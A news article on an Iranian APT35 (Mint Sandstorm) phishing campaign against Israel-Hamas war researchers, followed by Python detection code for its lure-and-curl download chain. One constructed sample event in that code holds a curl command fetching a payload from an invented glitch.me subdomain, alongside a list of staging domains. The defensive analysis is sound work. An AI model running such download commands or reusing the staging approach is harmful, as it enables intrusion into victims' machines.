Iranian Phishing Campaign Targets Israel-Hamas War Experts

Jan. 18, 2024

Iran-linked threat actors are targeting high-profile researchers working on the Israel-Hamas conflict via a sophisticated social engineering campaign, according to Microsoft Threat Intelligence.

The threat actor Mint Sandstorm (AKA APT35 and Charming Kitten), which has ties to Iranian military intelligence, is using bespoke phishing lures to entice targets into downloading malicious files, with the aim of stealing sensitive data.

The ongoing campaign, which was first spotted in November 2023, is targeting experts deemed to have the potential to influence intelligence and policies in areas of interest to the Islamic Republic of Iran.

Microsoft believes this campaign could be designed to gather different perspectives on the Israel-Hamas conflict from individuals across the ideological spectrum.

The targets primarily work at universities and research organizations in Belgium, France, Gaza, Israel, the UK and US.

How Mint Sandstorm is Targeting Middle East Experts

Microsoft said it has observed new tactics, techniques and procedures (TTPs) being utilized by Mint Sandstorm in this campaign, including the use of legitimate but compromised email accounts to send phishing lures.

Initially, the threat actor emails the target pretending to be a high-profile individual, such as a journalist at a reputable news outlet requesting input for an article about the Israel-Hamas war.

In some cases, the sending email address is spoofed to resemble the personal email account of the individual being impersonated.

In others, legitimate but compromised email accounts belonging to the impersonated individual are used.

The first message is benign and contains no malicious content, with the aim of building trust with the victim, according to Microsoft’s Threat Intelligence Team. The use of legitimate email accounts likely bolsters Mint Sandstorm’s credibility.

If the target agrees to review an article or document referenced in the initial email, the Iran-linked attackers follow up with an email containing a link to a malicious domain.

These domains host a RAR archive file purporting to contain the draft document. Once opened, the .rar archive decompresses into a double-extension file with the same name.

When this file is opened, it runs a curl command to retrieve a series of malicious files from Mint Sandstorm-controlled subdomains of glitch[.]me and supabase[.]co.
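As an added example (not code from the article or from Microsoft's report), the following Python sketches detection logic for the chain just described: curl launched by a double-extension file and fetching from subdomains of glitch[.]me or supabase[.]co. It assumes Sysmon-style process-creation fields; the extension lists and the sample events are constructed.

```python
import re
from urllib.parse import urlparse

# Parent domains the article names as hosting the retrieved files; the campaign
# used attacker-controlled subdomains under them.
STAGING_PARENT_DOMAINS = {"glitch.me", "supabase.co"}
# Which extensions count as "document" and "executable" is an assumption of
# this example; the article only says the archive yields a double-extension file.
DOCUMENT_EXTS = {"pdf", "doc", "docx", "txt", "rtf"}
EXECUTABLE_EXTS = {"lnk", "exe", "vbs", "js", "bat", "cmd", "scr", "hta", "ps1"}

def is_double_extension_lure(path: str) -> bool:
    """True for names like draft.pdf.lnk: a document extension hiding an executable one."""
    parts = re.split(r"[\\/]", path)[-1].lower().split(".")
    return len(parts) >= 3 and parts[-2] in DOCUMENT_EXTS and parts[-1] in EXECUTABLE_EXTS

def on_staging_domain(url: str) -> bool:
    """True if the URL host is one of the named domains or any subdomain of them."""
    host = (urlparse(url).hostname or "").lower()
    return any(host == d or host.endswith("." + d) for d in STAGING_PARENT_DOMAINS)

def triage(event: dict) -> list:
    """Return the reasons a process-creation event matches the article's chain."""
    reasons = []
    image = re.split(r"[\\/]", event["image"])[-1].lower()
    if image == "curl.exe":
        # Did a double-extension "document" launch curl?
        for tok in re.findall(r"[\w:\\/.\-]+", event["parent_cmdline"]):
            if is_double_extension_lure(tok):
                reasons.append(f"curl launched by double-extension file {tok}")
                break
        # Is curl pulling from a subdomain of the named staging domains?
        for url in re.findall(r"https?://[^\s\"']+", event["cmdline"]):
            if on_staging_domain(url):
                reasons.append(f"curl download from {urlparse(url).hostname}")
    return reasons

# Constructed sample events (Sysmon event 1 style); hostnames and paths are made up.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\curl.exe",
     "cmdline": r"curl.exe -s -o %TEMP%\s1.tmp https://draft-review.glitch.me/s1",
     "parent_cmdline": r"cmd.exe /c C:\Users\r\Downloads\Israel-Hamas_draft.pdf.lnk"},
    {"image": r"C:\Windows\System32\curl.exe", "cmdline": "curl.exe https://github.com/",
     "parent_cmdline": r'"C:\Program Files\Git\git-bash.exe"'},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(ev["parent_cmdline"], "->", triage(ev) or "clean")
```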
